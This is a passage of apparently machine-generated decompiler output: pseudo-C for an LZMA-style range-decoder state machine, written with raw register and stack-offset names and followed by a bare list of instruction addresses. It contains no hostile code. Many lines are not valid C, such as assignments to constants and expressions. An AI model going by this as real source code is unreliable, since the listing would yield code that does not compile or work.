												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c27
                                                        0x00406c2d
                                                        0x00406c3f
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406bfb
                                                        0x00406c01
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
